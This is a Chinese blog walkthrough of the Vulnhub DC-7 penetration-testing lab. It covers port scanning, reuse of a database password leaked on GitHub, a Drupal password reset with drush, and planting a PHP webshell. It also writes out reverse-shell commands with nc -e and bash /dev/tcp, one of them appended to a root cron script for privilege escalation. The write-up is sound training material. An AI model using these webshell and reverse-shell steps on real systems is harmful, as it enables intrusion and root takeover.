Vulnhub靶机入门系列DC:7

DC-7

靶机描述

DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will need to do, is to think "outside" of the box.
Waaaaaay "outside" of the box. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.

只有一个flag并且提示不用暴力破解

知识点总结

​ ①常规端口扫描

​ ②信息收集

​ ③drush使用

​ ④写入webshell

​ ⑤将反弹shell写入root权限执行的sh脚本

常规扫描

arp-scan -l

目标IP:192.168.2.185

root@kali:~#nmap -sV -p- 192.168.2.185
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))

开启了ssh(22端口),web服务(80端口)

访问web

image

CMS是Drupal,并且提示不使用暴力破解

这个CMS和DC-1是一样的,DC-1是7这个是8

先使用searchsploit搜一下漏洞,测试了几个都不管用,msf里同样

然后再回到主页,发现左下角有个@DC7USER 这让我想到之前一个朋友借用网上的模板搭建一个网站,并且主页的下边也用@表明了模板的来源,然后就顺势找到了模板源码以及配置,且他的密码为默认的于是就getshell了

这里我们上网搜索一下DC7USER

image

可以发现在github上有关于DC7USER的信息,Twitter上也有,查看一下

image

Twitter上放的也是Github上的链接,进入GitHub

image

这里提示是DC7的一些源码

查看config.php配置文件

<?php
    $servername = "localhost";
    $username = "dc7user";
    $password = "MdR3xOgB7#dW";
    $dbname = "Staff";
    $conn = mysqli_connect($servername, $username, $password, $dbname);
?>

这个像是数据库的连接账号密码,先使用它登录一下网站

登录提示无法识别账号密码,那说明不是网站的登录密码

那我们现在只有剩下的ssh登录需要密码了,试一下

image

ssh可以登录,并且提示 You have new mail 有个新邮件

查看当前目录有个backups和mbox,查看mbox

image

记录的是一个运行backups.sh的脚本将数据库备份到website.sql的操作

查看一下脚本的权限

image

发现www-data可以对此脚本进行操作

那我们就需要通过web获得shell才能对这个文件进行修改操作

查看一下内容

image

有个drush和gpg

gpg好像没什么用,但是搜索drush发现有个更改密码的操作

#drush描述:dursh是drupal的shell模式,可以执行对drupal的管理命令
drush user-password username --password="passwd"  #更改密码

但是提示

Command user-password needs a higher bootstrap level to run - you will need to invoke drush from a more functional Drupal environment to  [error]
run this command.
The drush command 'user-password username' could not be executed. 

然后又去看了看drush介绍,知道使用drush命令要在网站根目录进行,然后进入网站根目录

image

成功修改密码,然后登陆网站

在content中发现可以对网站内容进行修改

image

那我们直接往里边写入一句话木马

image

但是这里好像不支持php只有html,查了查需要单独安装插件让它支持php语言

image

点击Install new module

image

将下边的URL填进去点Install

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

安装成功后再返回上一个页面点List

image

在下边有个PHP Filter

image

选中安装,安装成功后就可以在网页写入php代码了

回到我们刚刚的编辑页面

image

选择PHP code插入一句话代码 选择save

image

然后访问http://192.168.2.185/node/1,使用菜刀或者蚁剑进行连接

注意:这里虽然直接访问主页http://192.168.2.185/

显示的内容和上边那个node/1这个链接显示的内容一样但其实我们写的shell并不在这里,我刚开始也是直接用主页链接连的蚁剑连不上,然后在主页的


image

这里点进去了edit再返回就会跳转到http://192.168.2.185/node/1这个页面,用这个链接就可以连上shell

然后我们在蚁剑上将shell反弹回我们的kali上

image
#kali机
nc -lvp 1234
#蚁剑
nc -e /bin/sh 192.168.2.138 1234

kali切换shell外壳

python -c 'import pty;pty.spawn("/bin/bash")'
image

现在我们可以对backups.sh文件进行修改了,我们可以把反弹shell写入sh文件中,因为sh文件是root执行的,所以返回的也是root权限

这里我们采用bash反弹shell

#在kali上监听1235端口
nc -lvp 1235
#将shell写入backups.sh中
echo "bash -i >& /dev/tcp/192.168.2.135/1235 0>&1" >> /opt/scripts/backups.sh

由邮件内容中发送的时间可知这个sh文件每隔15分钟会执行一次,耐心等待一会,获得shell,并进入root目录下查看flag

image

总结

常规流程:

​ ①扫描主机,发现目标

​ ②扫描目标端口,查看开启什么服务

​ ③从web入口找漏洞,熟悉一些web的漏洞

​ ④查看web的CMS以及插件,使用msf或者searchsploit搜索一下已存在的漏洞并利用

​ ⑤写入webshell 反弹给攻击机

​ ⑥提权

总之,安全之路还很长,需要更加努力,学的越多觉得懂的越少。
如有问题,欢迎指正!

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 143,809评论 1 304
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 61,651评论 1 257
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 95,178评论 0 213
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 41,241评论 0 181
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 49,047评论 1 259
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 38,899评论 1 178
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 30,503评论 2 274
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 29,249评论 0 168
  • 想象着我的养父在大火中拼命挣扎,窒息,最后皮肤化为焦炭。我心中就已经是抑制不住地欢快,这就叫做以其人之道,还治其人...
    爱写小说的胖达阅读 29,125评论 6 235
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 32,605评论 0 213
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 29,368评论 2 215
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 30,723评论 1 232
  • 白月光回国,霸总把我这个替身辞退。还一脸阴沉的警告我。[不要出现在思思面前, 不然我有一百种方法让你生不如死。]我...
    爱写小说的胖达阅读 24,285评论 0 32
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 27,190评论 2 214
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 31,634评论 3 209
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 25,651评论 0 9
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,052评论 0 167
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 33,638评论 2 232
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 33,760评论 2 237

推荐阅读更多精彩内容